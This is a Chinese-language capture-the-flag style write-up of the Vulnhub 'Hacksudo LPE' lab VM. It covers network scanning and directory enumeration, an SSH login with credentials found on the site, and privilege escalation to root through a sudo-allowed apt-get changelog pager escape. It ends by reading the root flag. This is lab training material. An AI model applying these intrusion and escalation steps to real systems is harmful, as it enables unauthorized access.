首页 > 其他分享 >Vulnhub之Hacksudo LPE靶机详细解题过程

Vulnhub之Hacksudo LPE靶机详细解题过程

时间:2022-11-23 22:48:49浏览次数:71  
标签:Status Hacksudo 192.168 56.215 Vulnhub -- LPE root Size

Hacksudo LPE

作者: Jason_huawen

靶机基本信息

名称:hacksudo: L.P.E.

地址:hacksudo: L.P.E. ~ VulnHub

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.126.0/16   |   Screen View: Unique Hosts                                                        
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:96:d2:34      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.215  08:00:27:b3:96:72      1      60  PCS Systemtechnik GmbH        

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.215

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.215 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-23 08:58 EST
Nmap scan report for localhost (192.168.56.215)
Host is up (0.00038s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 2a:ad:52:59:dc:7f:b0:e3:5b:47:36:d2:e7:1d:1a:5a (RSA)
|   256 d6:3f:d5:8e:fe:10:f5:bc:2c:a8:53:3b:78:ec:30:4e (ECDSA)
|_  256 b5:1e:df:2d:3f:3f:c6:f9:ca:37:a7:dc:8c:ba:c2:fa (ED25519)
80/tcp   open  http     Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
4200/tcp open  ssl/http ShellInABox
|_http-title: Shell In A Box
| ssl-cert: Subject: commonName=debian
| Not valid before: 2021-05-01T13:03:08
|_Not valid after:  2041-04-26T13:03:08
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:B3:96:72 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.51 seconds

NMAP扫描结果表明目标主机有3个开放端口:22(SSH)、80(HTTP)、4200(HTTPS)

Get Access

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ nikto -h http://192.168.56.215
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.215
+ Target Hostname:    192.168.56.215
+ Target Port:        80
+ Start Time:         2022-11-23 09:01:19 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ Root page / redirects to: login.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7915 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2022-11-23 09:02:11 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo

Nikto虽然给出了一些结果,比如/login.php,还有其他几个目录,但基本上没有利用价值。

接下来用Gobuster工具扫描目标站点有无其他文件和目录:

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ gobuster dir -u http://192.168.56.215 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.215
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              sh,php,html,txt
[+] Timeout:                 10s
===============================================================
2022/11/23 09:03:15 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/contact.php          (Status: 200) [Size: 82287]
/about.php            (Status: 200) [Size: 73082]
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.215/img/]
/products.html        (Status: 200) [Size: 16638]
/login.php            (Status: 200) [Size: 2886]
/index.php            (Status: 302) [Size: 0] [--> login.php]
/header.php           (Status: 302) [Size: 0] [--> /login.php]
/p                    (Status: 301) [Size: 312] [--> http://192.168.56.215/p/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.215/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.215/js/]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.215/javascript/]
/logout.php           (Status: 302) [Size: 0] [--> login.php]
/accounts.html        (Status: 200) [Size: 9057]
/config.php           (Status: 200) [Size: 0]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.215/fonts/]
/challenge            (Status: 301) [Size: 320] [--> http://192.168.56.215/challenge/]
/det                  (Status: 301) [Size: 314] [--> http://192.168.56.215/det/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1102060 / 1102805 (99.93%)===============================================================
2022/11/23 09:05:51 Finished
===============================================================

从Gobuster工具运行结果可以看出成功扫描出来/challenge目录,访问该目录:

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ curl http://192.168.56.215/challenge/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /challenge</title>
 </head>
 <body>
<h1>Index of /challenge</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="apt-get.php">apt-get.php</a></td><td align="right">2021-05-10 03:49  </td><td align="right">2.5K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="challenge.php">challenge.php</a></td><td align="right">2021-04-26 02:56  </td><td align="right">816 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="challenge1.php">challenge1.php</a></td><td align="right">2021-05-16 01:43  </td><td align="right">2.9K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="challenge2.php">challenge2.php</a></td><td align="right">2021-05-16 01:43  </td><td align="right">2.1K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="challenge3.php">challenge3.php</a></td><td align="right">2021-05-16 01:43  </td><td align="right">1.7K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="challenge4.php">challenge4.php</a></td><td align="right">2021-05-16 01:44  </td><td align="right">1.5K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="challenge5.php">challenge5.php</a></td><td align="right">2021-05-16 01:44  </td><td align="right">1.6K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="challenge6.php">challenge6.php</a></td><td align="right">2021-05-16 01:44  </td><td align="right">1.5K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="challenge8.php">challenge8.php</a></td><td align="right">2021-05-16 01:45  </td><td align="right">1.4K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="challenge9.php">challenge9.php</a></td><td align="right">2021-05-16 01:45  </td><td align="right">1.5K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="challenge10.php">challenge10.php</a></td><td align="right">2021-05-16 01:46  </td><td align="right">1.4K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="challenge11.php">challenge11.php</a></td><td align="right">2021-05-13 05:28  </td><td align="right">1.5K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="demo.php">demo.php</a></td><td align="right">2021-05-10 03:55  </td><td align="right">2.5K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="flag.php">flag.php</a></td><td align="right">2021-05-10 05:21  </td><td align="right">917 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="logo.png">logo.png</a></td><td align="right">2021-04-26 04:31  </td><td align="right"> 29K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="page/">page/</a></td><td align="right">2021-05-16 01:26  </td><td align="right">  - </td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.215 Port 80</address>
</body></html>

返回页面中的第一个链接含有用户名密码信息:

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ curl http://192.168.56.215/challenge/apt-get.php
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>

<h2 style="padding-bottom: 190px;"></h2>
<form method="post" action="../challenge/challenge1.php">
   <button type="submit"  class="btn btn-outline-dark" style="margin-bottom: -100px">Back</button>
</form>
<h3><p style="text-align:right;"><a href="https://leetvilu.blogspot.com/">For more information about apt-get</a></p></h3>
</body>

<hr class="hr">
<div class="container">
<footer class="footer">
        <center><p style="margin-left:65px; color:#777777" class="text-center" >&copy; HackSudo 2021</p></center>
      </footer>
      
</div>
<script src="../../assets/js/ie10-viewport-bug-workaround.js"></script>
</html>
                                 

尝试一下,看是否可以使用用户名user1和密码hacksudo登录ssh

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ ssh [email protected] 
The authenticity of host '192.168.56.215 (192.168.56.215)' can't be established.
ED25519 key fingerprint is SHA256:iSCtzn93Zn0wahmO4fJNBoPyqcsZCVH++PlJTVmt7Xs.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.215' (ED25519) to the list of known hosts.
[email protected]'s password: 
Linux hacksudoLPE 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun May 16 04:16:42 2021 from 192.168.1.4
user1@hacksudoLPE:~$ id
uid=1001(user1) gid=1001(user1) groups=1001(user1)
user1@hacksudoLPE:~$ 

提权

user1@hacksudoLPE:~$ sudo -l
Matching Defaults entries for user1 on hacksudoLPE:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user1 may run the following commands on hacksudoLPE:
    (root) NOPASSWD: /usr/bin/apt-get
user1@hacksudoLPE:~$ 

Sudo -l 结果说明可以利用apt-get进行提权,参考GTFOBINS网站的提权方法,即可成功提权!

user1@hacksudoLPE:~$ sudo /usr/bin/apt-get changelog apt
Get:1 store: apt 1.8.2.2 Changelog
Fetched 458 kB in 0s (44.3 MB/s)
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -alh
total 68K
drwx------  5 root root 4.0K May 16  2021 .
drwxr-xr-x 21 root root 4.0K May  7  2021 ..
-rw-------  1 root root 1.8K May 16  2021 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwx------  3 root root 4.0K May  6  2021 .gnupg
-rw-------  1 root root   36 May  1  2021 .lesshst
drwxr-xr-x  3 root root 4.0K May  1  2021 .local
-rw-------  1 root root    0 May  6  2021 .node_repl_history
-rw-r--r--  1 root root  176 May  1  2021 .profile
-rw-r--r--  1 root root   11 May 16  2021 root.txt
-rw-r--r--  1 root root   75 May  8  2021 .selected_editor
drwx------  2 root root 4.0K May 16  2021 .ssh
-rw-------  1 root root  24K May 16  2021 .viminfo
# cat root.txt
viluhacker

成功提权,拿到root flag.

标签:Status,Hacksudo,192.168,56.215,Vulnhub,--,LPE,root,Size
From: https://www.cnblogs.com/jason-huawen/p/16920384.html

相关文章

  • Vulnhub之Hacksudo Alien靶机解题过程
    HacksudoAlien识别目标主机IP地址──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.80.0/16|ScreenV......
  • Vulnhub之Hacksudo 3靶机解题过程
    Hacksudo3识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Hacksudo3]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.61.0/16|ScreenView:Unique......
  • VulnHub靶场渗透实战8-DarkHole: 2
    靶场地址:DarkHole:2~VulnHubDescriptionBacktotheTopDifficulty:HardThisworksbetterwithVMwareratherthanVirtualBoxHint:Don'twasteyourtimeForB......
  • Vulnhub之Hacksudo ProximaCentaur靶机解题过程
    HacksudoProximaCentaur识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Hacksudo_ProximaCentaur]└─$sudonetdiscover-ieth1Currentlyscanning:172.16.2.0/16......
  • Vulnhub之Hacksudo FOG靶机解题过程
    HacksudoFOG识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.83.0/16|ScreenVi......
  • Vulnhub之Hackathon 2靶机详细解题过程
    Hackathon2作者:jason_huawen靶机基本信息名称:HackathonCTF:2地址:https://www.vulnhub.com/entry/hackathonctf-2,714/识别目标主机IP地址由于目标主机无法从Virtu......
  • Vulnhub之Hackable II靶机详细解题过程
    HackableII作者:Jason_huawen靶机基本信息名称:Hackable:II地址:https://www.vulnhub.com/entry/hackable-ii,711/识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub......
  • Vulnhub之Gigachad靶机解题过程
    Gigachad靶机基本信息名称:Gigachad1地址:https://www.vulnhub.com/entry/gigachad-1,657/识别目标IP地址┌──(kali㉿kali)-[~/Vulnhub/Gigachad]└─$sudonetdis......
  • vulnhub靶场之DIGITALWORLD.LOCAL: SNAKEOIL
    准备:攻击机:虚拟机kali、本机win10。靶机:DIGITALWORLD.LOCAL:SNAKEOIL,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/digital......
  • Vulnhub之Funbox Gaokao靶机解题过程
    FunboxGaokao靶机基本信息名称:Funbox:GaoKao地址:https://www.vulnhub.com/entry/funbox-gaokao,707/提示:Don'twasteyourtime!EveryBruteForce-Attackatallp......